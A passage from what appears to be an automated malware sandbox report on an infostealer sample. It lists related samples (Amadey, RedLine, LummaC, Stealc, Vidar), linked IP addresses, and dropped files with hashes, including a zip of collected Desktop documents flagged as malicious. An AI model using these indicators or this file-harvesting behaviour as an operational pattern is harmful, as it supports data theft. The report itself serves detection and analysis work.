                                        1kVFouIuPk.exeGet hashmaliciousAmadey, RedLineBrowse
                                          A168QvNYkQJd.exeGet hashmaliciousRedLineBrowse
                                            tuFsQKQcox.exeGet hashmaliciousRedLineBrowse

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              WHOLESALECONNECTIONSNLZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                              • 185.215.113.217
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1510207563435464
                                              Encrypted:false
                                              SSDEEP:3:Nlllul81Z:NllU
                                              MD5:BC99142C0E96F3B810C7E970C36D8299
                                              SHA1:062D09B0F560CA246C4E2163CCE2DD553A8AA6D1
                                              SHA-256:0FD0F8B959602184F6D19D5737223FE0C058A797EEB65D44E287346E7240FEBF
                                              SHA-512:C1A0B9BB682ABFF35DB39DFF29AC147D951E70AF5FF741DA26BB03F6446908F9B1BE511BC1901C35AF91299599E84FDFECA28EA6C0F81E22A342F69E74D84923
                                              Malicious:false
                                              Preview:@...e...............................4.,..............@..........

                                              C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                              Category:dropped
                                              Size (bytes):4612
                                              Entropy (8bit):7.786678467594796
                                              Encrypted:false
                                              SSDEEP:96:3IBPwzYgAqRUTBPwzYgAqRHWMMYRkZSYsnt8qJyyyXNgAldJqSa/SFxZ4lX4SQh:3IBPwzYgQTBPwzYgLWHJZS1Jlidl94lK
                                              MD5:9DD8B293344AFAFFD8BC7AE4465033E0
                                              SHA1:738D3451DCE51E34C0F4137C623D3C5D39AF1DCB
                                              SHA-256:017CB91FD8FF434BC5AFFB4C6AE902D1EF14179C1D0E3A5F48972EC1C3929A8F
                                              SHA-512:3B45AFAE03AA64A81A5BEF57BC6256F7475FA06FA5FF5D2A0C0D6C8A489CA9FACC6F1986E28383467035B20BC62D24C52988E529B9DC077067760D5C3C6362B5
                                              Malicious:true
                                              Preview:PK........S@DW..............._Files_\DVWHKMNFNN.docx..Ir@!.D....?....p...l....aeA..K...E.....[.ph..kQ..T..j.uUnVT.$U...K7+}lZ..I.](.X..5b>..M.".uSl....u....|.c..'}.U ....2.'....U0A..*qO..v.9X.Z...n.E}....us..,]...[g.:..-...6:_.PK...H...=..P...q....).@d^..Ou..W.S.=.....d..[!..L...rr]C.M&S.E}.e:>K.[...U.......;.F.Z.vW.6.,.r.[...hh;......\.Cm.p......-_..d..Q.. .i.6..J..........|.C.Dp.....).....o8.,...SV..2\$p.eNG......^.(-....7...RA.j......q..U;...<#VZ.Ut...6......h.........2.Kf......j8.......>W...u...4..d..z.>...s..9.p.Q.)...t<...`.m..R.(.|w.!.....J.y.]j...-......[.-{3..W.=..\.M<O..$...}...G.;n..N.......w.W...f..$.y.$jw...N7..=:.....K..=..."[?2....PK........S@DW..............._Files_\DVWHKMNFNN.xlsx..Ir@!.D....?....p...l....aeA..K...E.....[.ph..kQ..T..j.uUnVT.$U...K7+}lZ..I.](.X..5b>..M.".uSl....u....|.c..'}.U ....2.'....U0A..*qO..v.9X.Z...n.E}....us..,]...[g.:..-...6:_.PK...H...=..P...q....).@d^..Ou..W.S.=.....d..[!..L...rr]C.M

                                              C:\Users\user\AppData\Local\Temp\_Files_\DVWHKMNFNN.docx

                                              Download File
                                              Process:C:\Windows\System32\rundll32.exe
                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1026
                                              Entropy (8bit):4.694985340190863
                                              Encrypted:false
                                              SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                              MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                              SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                              SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                              SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                              Malicious:false
                                              Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                              C:\Users\user\AppData\Local\Temp\_Files_\DVWHKMNFNN.xlsx

                                              Download File
                                              Process:C:\Windows\System32\rundll32.exe
                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1026
                                              Entropy (8bit):4.694985340190863
                                              Encrypted:false
                                              SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                              MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                              SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                              SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                              SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                              Malicious:false
                                              Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                              C:\Users\user\AppData\Local\Temp\_Files_\HTAGVDFUIE.docx

                                              Download File
                                              Process:C:\Windows\System32\rundll32.exe
                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1026
                                              Entropy (8bit):4.692693183518806
                                              Encrypted:false
                                              SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                              MD5:78F042E25B7FAF970F75DFAA81955268
                                              SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                              SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                              SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                              Malicious:false
                                              Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                              C:\Users\user\AppData\Local\Temp\_Files_\LTKMYBSEYZ.docx

                                              Download File
                                              Process:C:\Windows\System32\rundll32.exe
                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1026
                                              Entropy (8bit):4.687722658485212
                                              Encrypted:false
                                              SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                              MD5:9A59DF7A478E34FB1DD60514E5C85366
                                              SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                              SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                              SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                              Malicious:false
                                              Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                              C:\Users\user\AppData\Local\Temp\_Files_\NWTVCDUMOB.xlsx

                                              Download File
                                              Process:C:\Windows\System32\rundll32.exe
                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1026
                                              Entropy (8bit):4.696250160603532
                                              Encrypted:false
                                              SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                              MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                              SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                              SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                              SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                              Malicious:false
                                              Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                              C:\Users\user\AppData\Local\Temp\_Files_\YPSIACHYXW.xlsx

                                              Download File
                                              Process:C:\Windows\System32\rundll32.exe
                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1026
                                              Entropy (8bit):4.700014595314478
                                              Encrypted:false
                                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                              Malicious:false
                                              Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mvdsc4l.gss.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aaaz4ces.mtg.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5ljgi1z.5fi.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekkgpxbg.yeb.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2jrhzku.1jo.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzu1gptt.12s.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpdbn1rn.kra.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mclxjvfo.iue.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptaszgq1.0h0.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
